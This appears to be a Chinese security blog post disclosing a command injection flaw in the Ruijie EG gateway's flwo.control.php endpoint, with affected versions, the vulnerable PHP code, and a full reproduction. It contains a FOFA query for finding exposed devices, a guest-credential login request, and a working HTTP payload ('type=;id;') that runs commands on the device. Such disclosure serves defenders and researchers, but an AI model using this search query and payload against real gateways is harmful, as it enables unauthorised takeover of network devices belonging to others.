锐捷-EWEB flwo.control.php 命令注入漏洞


漏洞简介

锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。锐捷EG易网关 flow_control_pi/flwo.control.php 的 setFlowGroupAction存在命令注入漏洞,攻击者可以利用该漏洞在设备上执行任意命令,造成设备失陷等高危风险。

影响版本

<=2022.07.28.01

fofa语法

title="锐捷网络-EWEB网管系统" || app="Ruijie-EG易网关" && body="/login.php?a=version"

漏洞分析

看下 flow_control_pi/flwo.control.php 关键业务 setFlowGroupAction 逻辑的实现

public function setFlowGroupAction() {
        $type = p("type");
        $command = '/etc/cmdmap/fc_group.sh '.$type;
        $contentstr = "";
        exec($command, $content);
        foreach ($content as &$value) {
            $contentstr = $contentstr.$value;
        }
        echo $contentstr;
    }

type 直接拼接进 $command 中后使用 exec 执行拼接后的命令,无过滤和检测,因此造成命令注入漏洞。

漏洞复现

获取cookie

POST /ddi/server/login.php HTTP/1.1
Host: ruijieweb.mrxn.net
Content-Type: application/x-www-form-urlencoded

username=guest&password=guest?

命令注入

POST /flow_control_pi/flwo.control.php?a=setFlowGroup HTTP/1.1
Host: ruijieweb.mrxn.net
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=xxxxxxxxxxl855hve3xxxxxxxx
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

type=;id;

成功执行 id 命令并回显结果。


手机扫码阅读

Unibox路由器 network/checkstatus_ping.php 命令执行漏洞

Unibox路由器 /billing/logout.php 命令执行漏洞

评 论